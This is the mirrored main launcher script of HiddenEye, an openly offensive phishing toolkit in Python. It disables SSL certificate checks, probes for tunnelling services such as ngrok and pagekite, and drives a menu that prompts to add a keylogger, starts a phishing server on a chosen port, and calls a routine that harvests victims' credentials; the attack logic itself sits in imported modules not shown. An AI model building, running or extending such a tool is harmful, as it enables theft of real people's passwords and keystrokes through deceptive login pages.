mirror of
https://github.com/DarkSecDevelopers/HiddenEye-Legacy.git
synced 2024-03-22 21:12:55 +08:00
58 lines
1.4 KiB
Python
Executable File
58 lines
1.4 KiB
Python
Executable File
#!/usr/bin/python3
|
|
#
|
|
# HiddenEye by https://dark-sec-official.com
|
|
#
|
|
|
|
from Defs.Languages import *
|
|
from Defs.Actions import cloudflarePrompt
|
|
from Defs.Configurations import *
|
|
from Defs.Checks import *
|
|
import multiprocessing
|
|
import gettext
|
|
import sys
|
|
import ssl
|
|
from os import system, environ
|
|
|
|
if(not environ.get('PYTHONHTTPSVERIFY', "") and getattr(ssl, '_create_unverified_context', None)):
|
|
ssl._create_default_https_context = ssl._create_unverified_context
|
|
|
|
|
|
RED, WHITE, CYAN, GREEN, DEFAULT = '\033[91m', '\033[46m', '\033[36m', '\033[1;32m', '\033[0m'
|
|
checkPermissions()
|
|
installGetText()
|
|
languageSelector()
|
|
checkConnection()
|
|
verCheck()
|
|
checkPHP()
|
|
checkLocalxpose()
|
|
checkNgrok()
|
|
checkOpenport()
|
|
checkPagekite()
|
|
checkLT()
|
|
ifSettingsNotExists()
|
|
readConfig()
|
|
|
|
if __name__ == "__main__":
|
|
try:
|
|
runMainMenu()
|
|
mainMenu()
|
|
|
|
keyloggerprompt()
|
|
addingkeylogger()
|
|
cloudflarePrompt()
|
|
emailPrompt()
|
|
inputCustom()
|
|
port = selectPort()
|
|
|
|
##############
|
|
runServer(port)
|
|
selectServer(port)
|
|
|
|
multiprocessing.Process(target=runServer, args=(port,)).start()
|
|
getCredentials(port)
|
|
|
|
except KeyboardInterrupt:
|
|
port = '8080' # When Keyword Interrupt Occurs before defining Port by User. Script will use 8080 port.(Just To Remove Exception Errors)
|
|
endMessage(port)
|
|
exit()
|